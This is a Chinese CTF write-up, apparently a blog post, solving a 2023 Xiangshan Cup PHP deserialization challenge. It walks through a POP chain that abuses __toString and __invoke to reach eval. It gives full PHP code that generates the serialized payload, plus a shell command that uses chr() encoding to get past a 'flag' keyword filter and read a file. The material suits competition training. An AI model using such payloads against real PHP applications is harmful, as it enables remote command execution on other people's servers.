2023香山杯php反序列化题解

打开看出来是反序列化的题目

有三个类,构造pop链将三个类串起来,可以看出入口是$GET[data],出口是G00D的eval,eval里可以产生命令执行漏洞

要命令执行就要进入G00D内并利用魔术方法__invoke(),利用条件是当函数被当成变量执行时就自动执行__invoke(),整个代码里只有H4CK3R类里

$function= $this->func;
            $function();

要执行上述代码就要进入_tosring(),而这个魔术方法的执行条件其中一个是当输出字符串时,这样而Welcome类里就有echo输出函数,这样我们就可以将三个类连起来

<?php

class Welcome{

public $arg;

public $name='A_G00d_H4ck3r';

}

class H4ck3r{

public $func;

}

class G00d{

public $shell='system';

public $cmd='cd /;more `php -r "echo chr(102).chr(49).chr(97).chr(103);"`';

}

$a = new Welcome();

$b = new H4ck3r();

$c = new G00d();

$b->func=$c;

$a->arg=$b;

echo serialize($a);

而命令执行出有对flag的正则过滤我们可以采用cd /;more `php -r "echo chr(102).chr(49).chr(97).chr(103);"`来应对。

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值